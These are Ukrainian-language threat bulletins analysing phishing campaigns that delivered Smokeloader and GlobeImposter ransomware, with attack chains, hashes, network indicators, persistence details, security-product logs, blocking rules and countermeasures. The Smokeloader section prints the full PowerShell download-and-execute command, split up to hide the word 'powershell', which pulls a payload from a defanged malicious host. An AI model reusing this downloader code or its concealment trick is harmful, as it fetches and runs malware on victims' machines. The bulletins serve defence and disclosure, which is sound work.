  • Заборона створення та зчитування/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Заборона вихідних мережевих зєднань для процесів Powershell
  • Заборона виклику Powershell через WSCript – додатково захистить від скриптів що йдуть як OLE об’єкти
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_smokeldr_300118

Доброго дня, панове.

31 січня о другій половині дня були зафіксовані спроби доставки троянського коду типу Smokeloader (Chanitor) (розглядалися раніше тут, тут і тут).

Може використовуватися для збору інформації та/або для доставки ransomware чи засобів майнінгу криптовалют.

Приклад фішингу із приєднанням:

Трохи аналітики:

  • Зверніть увагу на претекст середньої якості (без підпису і з нормальними заголовками)
  • Рівень загрози – середній, для організацій, що прислухалися до наших попередніх рекомендацій – низький.
  • Схема роботи та інші атрибути вказують на роботу тої самої команди що розсилала цей же тип ШПЗ 17 жовтня а також 11 листопада
  • Доставка – через обфусковані JS скрипти оболонці RAR
  • Сервер, що розповсюджує основну частину = сервер контролю
  • Скрипт який було надано а аналіз містить одну чітко вказану адресу, а основна частина записується з чітко заданим іменем файлу
  • Завантаження основної частини відбувається не через WSH, а засобами Powershell
  • Запуск шкідливого коду не потребує прав Адміністратора
  • Зважаючи на “почерк” цієї команди, ми припускаємо, що могли бути й інші спроби доставки цього коду не лише з сервісів РФ, але й із скомпрометованих скриньок/серверів вітчизняних установ

Схема атаки:

email > Attach (RAR) > JS > single hardcoded URL > GET > %temp%\5541.exe

Маркери IOC:

скрипт приманка:

File name гарантійний лист.js
SHA-256 aabd7951f147d05a2f92caf35f1fe45e43eb6a05deaab451e0086c74e4289e2f
File size 18.8 KB

адреса на яку вказує скрипт:

$env:temp + '\5541.exe';$http_request.open('GET', 'h11p://enterwords[.]ru/uadoc/crsse.exe

основна частина:

File name crsse.exe >> %temp%\5541.exe
SHA-256 45b3091d63c462eda461bae08e3d781665ce10e3dacd6ef7169f630a11109a3e
File size 340 KB

Отже, запуск скрипта ініціює завантаження основної частини засобами Powershell

(!) зверніть увагу – на відміну від попередньої розсилки, передачу команд зробили з конкатенацією (розбили на шматки)

"C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\гарантійний лист.js"

"C:\Windows\System32\cmd.exe" /k set _a1=pow&& set _a2=ersh&& set _a3=ell&& call %_a1%%_a2%%_a3% $http_request = New-Object -ComObject Msxml2.XMLHTTP;$adodb = New-Object -ComObject ADODB.Stream;$path = $env:temp + '\5541.exe';$http_request.open('GET', 'h11p://enterwords[.]ru/uadoc/crsse.exe', $false);$http_request.send();if($http_request.Status -eq "200"){$adodb.open();$adodb.type = 1;$adodb.write($http_request.responseBody);$adodb.position = 0;$adodb.savetofile($path);$adodb.close();}else{   Write-Host $http_request.statusText; }Start-Process $path;

powershell  $http_request = New-Object -ComObject Msxml2.XMLHTTP;$adodb = New-Object -ComObject ADODB.Stream;$path = $env:temp + '\5541.exe';$http_request.open('GET', 'h11p://enterwords[.]ru/uadoc/crsse.exe', $false);$http_request.send();if($http_request.Status -eq "200"){$adodb.open();$adodb.type = 1;$adodb.write($http_request.responseBody);$adodb.position = 0;$adodb.savetofile($path);$adodb.close();}else{   Write-Host $http_request.statusText; }Start-Process $path;

"C:\tmp\5541.exe"

Після завантаження та запуску payload негайно зупиняє роботу утиліт моніторингу, копіює себе у (співпадає з попередньою розсилкою)

%User%\AppData\Roaming\Microsoft\tjerrirf\rtdiubth.exe

Та додає себе у автозавантаження через HCU\Run

HKEY_USERS\S-1-5-....\Software\Microsoft\Windows\CurrentVersion\Run
Chromium 
c:\users\operator\appdata\roaming\microsoft\tjerrirf\rtdiubth.exe

Запускає кілька нових екземплярів explorer.exe і оперує від їх імені.

(!) зверніть увагу, що запущені процеси на х64 запускаються не з C:\Windows (штатний режим) а з C:\Windows\SYSWOW64\

Мережеві IOC:

завантаження payload – станом на 10ту ранку 1го лютого досі активна!

45.32.179.137:80 HTTP enterwords[.]ru GET /uadoc/crsse.exe

трафік скомпрометованої системи – сервер контролю

45.32.179.137:80 HTTP abank[.]bit POST / HTTP/1.1  (application/x-www-form-urlencoded)

Що можна було зробити аби уникнути інфікування ?

  1. Пересилку архіву із скриптом можна було заблокувати через фільтр приєднань по розширенням/типам файлів
  2. Запис JS приманки на диск (розпаковку файлів) можна було заборонити через блок створення JS файлів в профілі користувача (групові політики або Access Protection Rules)
  3. Запуск JS приманки можна було зупинити через деактивацію механізму Windows Script Host (зміна одного ключа реєстру)
  4. Завантаження основного коду можна було зупинити блокуванням мережевих з’єднань для процесу Powershell (одне правило вбудованого брандмауера)
  5. Передачу команди з WSCript на Powershell можна було заборонити через Access Protection Rules
  6. Створення та подальший запуск основного тіла можна було заборонити блокуванням створення та запуск .exe файлів у каталозі профілю %Userprofile% (групові політики або Access Protection Rules)

Таким чином, як бачите, до запуску основного тіла було 6 кроків, упередження хоча би одного з них = зупинка атаки.

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам
  • Блокування доступу до мережі Інтернет для процесу WScript.exe та Powershell (варіант 1й)
  • Деактивація механізму Windows Script Host (варіант 2й)
  • Заборона створення та зчитування/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Заборона виклику Powershell через WSCript – додатково захистить від скриптів що йдуть як OLE об’єкти
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_GlobeImposter_211217

Доброго вечора, панове.

Вчора по обіді була зафіксована масова розсилка Globeimposter Ransomware.
Схожий зразок розсилали 30/11/17, проте тоді застосовували необфусковані VBS скрипти:


Цього разу метод доставки- обфускований JS. Шлях запису та ім’я файлу чітко задано в скрипті.
Payload не кодований.

Рівень загрози (для організацій котрі не вжили заходів щодо скриптів) – середній.

Для тих, хто прислухався до наших попередніх рекомендаційнизький.

Схема атаки:

email > Attach: 7z(.JS)  > WSCRIPT > GET /psndhFTwd??MYBlBYTYWjc=MYBlBYTYWjc > %temp%\MYBlBYTYWjc2.exe

Маркери IOC:

приманка у вигляді JS файлу яку жертва має сприйняти за зображення відсканованого документу:

File name IMG_20171221_345358418.js
SHA-256 d5977c433a0d03416d79e78cf765add480ebbc120a80b5d2d96254ca3c37b2e1
File size 14.54 KB

після запуску JS він обробляється процесом WSCript, який і виконує завантаження основного тіла:

“C:\Windows\System32\WScript.exe” “C:\Users\operator\Desktop\IMG_20171221_345358418.js”

File name psndhFTwd >> %temp%\MYBlBYTYWjc2.exe 
SHA-256 410efb1938ab06cf29acbcd24a3eca81c5d6d0c84778997adad1b5f0ecfb455c
File size 198.5 KB

після завантаження основне тіло записується в %temp% і запускається через виклик від імені процесу cmd

cmd.exe /c START “”  C:\tmp/MYBlBYTYWjc2.exeC:\tmp/MYBlBYTYWjc2.exe

C:\tmp/MYBlBYTYWjc2.exe

основне тіло після завантаження копіює себе у AppData і додає в перелік автозавантаження:

HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce

BrowserUpdateCheck c:\users\operator\appdata\roaming\myblbytywjc2.exe

Шифрує одразу без підвищення прав користувача.

Зашифровані файли отримують розширення ..doc

# # # # # #

Додатково надаю спрацювання по правилам захисту доступу (блокування було деактивоване навмисне щоб отримати повні звіти)

VSE_AP_LogOnly

APM11\operator C:\WINDOWS\EXPLORER.EXE C:\USERS\OPERATOR\DESKTOP\IMG_20171221_345358418.JS User-defined Rules:_JS_pro_BLK Action blocked : Read
APM11\operator C:\WINDOWS\EXPLORER.EXE C:\USERS\OPERATOR\DESKTOP\IMG_20171221_345358418.JS User-defined Rules:_JS_pro_BLK Action blocked : Read
APM11\operator C:\WINDOWS\SYSTEM32\WSCRIPT.EXE C:\USERS\OPERATOR\DESKTOP\IMG_20171221_345358418.JS User-defined Rules:_JS_pro_BLK Action blocked : Read
APM11\operator C:\WINDOWS\SYSTEM32\WSCRIPT.EXE C:\TMP\TEMPORARY INTERNET FILES\COUNTERS.DAT Anti-spyware Maximum Protection:Prevent execution of scripts from the Temp folder Action blocked : Write
APM11\operator C:\WINDOWS\SYSTEM32\WSCRIPT.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\AUTODETECT Anti-spyware Standard Protection:Protect Internet Explorer favorites and settings Action blocked : Delete
APM11\operator C:\WINDOWS\SYSTEM32\WSCRIPT.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP\AUTODETECT Anti-spyware Standard Protection:Protect Internet Explorer favorites and settings Action blocked : Create
APM11\operator C:\WINDOWS\SYSTEM32\WSCRIPT.EXE Common Maximum Protection:Prevent HTTP communication 185.111.232.52:80
APM11\operator C:\TMP\MYBLBYTYWJC2.EXE C:\USERS\OPERATOR\APPDATA\ROAMING\MYBLBYTYWJC2.EXE User-defined Rules:_EXE_pro_BLK Action blocked : Create
APM11\operator C:\TMP\MYBLBYTYWJC2.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE\BROWSERUPDATECHECK Common Maximum Protection:Prevent programs registering to autorun Action blocked : Create
Blocked by Access Protection rule 
APM11\operator C:\TMP\MYBLBYTYWJC2.EXE C:\VSE\* Common Standard Protection:Prevent modification of McAfee files and settings Action blocked : Write
APM11\operator C:\TMP\MYBLBYTYWJC2.EXE C:\USERS\OPERATOR\APPDATA\ROAMING\MOZILLA\FIREFOX\* Common Standard Protection:Protect Mozilla & FireFox files and settings Action blocked : Write
APM11\operator C:\TMP\MYBLBYTYWJC2.EXE C:\TMP\TEMPORARY INTERNET FILES\CONTENT.IE5\CONTAINER.DAT Anti-virus Maximum Protection:Protect cached files from password and email address stealers Action blocked : Write

Мережеві IOC:

завантаження основного тіла:

185.111.232.52:80 www.seffafkartvizitim[.]com GET /psndhFTwd??MYBlBYTYWjc=MYBlBYTYWjc

Додаткові маркери за даними malware-traffic-analysis.net/

Сервери які розповсюджують основну частину:

h11p://www.g-v-s[.]ru/psndhFTwd?
h11p://www.homody[.]com/psndhFTwd?
h11p://www.mcwhorterdesign[.]com/psndhFTwd?
h11p://www.seffafkartvizitim[.]com/psndhFTwd?
h11p://www.topanswertips[.]info/psndhFTwd?
h11p://www.tuminsaat[.]com/psndhFTwd?
h11p://www.rdpassistance[.]com/PuaneYDG?
h11p://www.rutor[.]space/PuaneYDG?
h11p://www.sclionionescu[.]ro/PuaneYDG?
h11p://www.servicetrade24[.]ru/PuaneYDG?
h11p://www.soslavanderia[.]com.co/PuaneYDG?
h11p://www.vseteplo[.]by/PuaneYDG?

Теми листів:

 Subject: Emailing: IMG_20171221_970542999, IMG_20171221_105610661, IMG_20171221_330199554_HDR
 Subject: Emailing: IMG_20171221_680272343, IMG_20171221_209718394, IMG_20171221_691812068_HDR
 Subject: Emailing: IMG_20171221_855525309, IMG_20171221_558874225, IMG_20171221_633843547_HDR
 Subject: Emailing: IMG_20171221_093043189, IMG_20171221_414525016, IMG_20171221_777953000_HDR
 Subject: Emailing: IMG_20171221_582764807, IMG_20171221_829866923, IMG_20171221_194629228_HDR
 Subject: Emailing: IMG_20171221_501005613, IMG_20171221_798070330, IMG_20171221_271932520_HDR
 Subject: Emailing: IMG_20171221_870284477, IMG_20171221_993512867, IMG_20171221_458229113_HDR
 Subject: Emailing: IMG_20171222_924030478, IMG_20171222_104259967, IMG_20171222_350843050_HDR
 Subject: Emailing: IMG_20171221_167023012, IMG_20171221_911069898, IMG_20171221_259887793_HDR
 Subject: Emailing: IMG_20171222_358078220, IMG_20171222_235116613, IMG_20171222_702416975_HDR

Контрольні суми приєднань:

 ca75b8a86fed3a725a2eaae1a37ff1277ec267818d53a963d4ae1c4e7573859a - IMG_20171221_312327133.js
 3e0a6f75b7a6bd527d26de7c23d76fada787e02a496fb2fb99207217385fb15a - IMG_20171221_498152824.js
 a9929327b937efcb1a0d39bd6bddaaa450629c3d74cde81c7167feb4f33c794d - IMG_20171221_499864685.js
 e349e7c6d04157dac849967da08033b685730f07f382f90a693943296fccd5bb - IMG_20171221_508871502.js
 2570fea4e10fb51e559d0d2dc9714837e25870b5e5413e1931a5c8cf39ba6b1c - IMG_20171221_555275412.js
 c01a8ef796ad0d79c2e0d08a5da677242da0b4d24743124c134e6f7f4992bb7c - IMG_20171221_698827418.js
 5314187cb13387df3759afa81fe0c4d97c4e35e2717e0000db3181ab1bde61a5 - IMG_20171221_725213643.js
 063b9d113fc153dfa153efee1d496b72230c89ca2623cca69ab6c7ecefde0559 - IMG_20171221_797605201.js
 4b3c49b00a5c40af3cad9ec02bc96baf61edd0f645fb2cb177f20bfb6f3f71a2 - IMG_20171221_836062519.js
 57e6d4f037eecc0af58adc58fe7c4b43efd96f05c321b9025d53810131bdd5fd - IMG_20171221_968347573.js

Приклади правил Access Protection (McAfee VSE, McAfee ENS):

Заборона створення скриптових файлів

Name: _script_BLK
Action: Block, Report
Process to include: * 
Processes to exclude: -
Subrule: _script_files
Files
+ Read  
+ Create
Targets Include: 
**\Users\*\**\*.JS
**\Users\*\**\*.JSE
**\Users\*\**\*.VBS
**\Users\*\**\*.WSF

Заборона створення запускних файлів

Name: _exe_prof_BLK
Process to include: *
Processes to exclude: -
File or folder name to block: **\Users\*\**\*.EXE
File actions to prevent:
+ Create
+ Read
+ Execute

Контрзаходи:
  • Перевірка журналів мережевого обладнання по наданим маркерам (звертайте увагу не стільки на конкретні URL як на коди GET запитів)
  • Блокування завантаження запусних файлів (payload не шифрований)
  • Деактивація механізму Windows Script Host (варіант 2й)
  • Блокування доступу до мережі Інтернет для процесу WSCript (варіант 1й)
  • Заборона створення та зчитування/запуску *.EXE та скриптів з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR